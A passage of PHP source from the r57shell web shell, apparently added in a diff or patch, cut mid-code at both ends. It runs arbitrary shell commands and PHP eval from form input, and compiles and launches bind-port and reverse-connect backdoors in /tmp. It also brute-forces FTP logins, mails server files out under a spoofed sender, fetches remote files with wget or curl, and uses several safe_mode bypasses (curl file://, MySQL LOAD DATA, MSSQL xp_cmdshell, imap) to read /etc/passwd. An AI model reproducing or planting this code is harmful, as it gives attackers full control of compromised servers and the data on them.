ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=yellow><b>OS Servers :'.ws(1).'<br>Server :'.ws(1).'<br>Uname :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=yellow><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; + +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000><font color=yellow face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); + @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + case 'test8': + if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118']; + else echo $lang[$language.'_text119']; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"phpinfo.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo 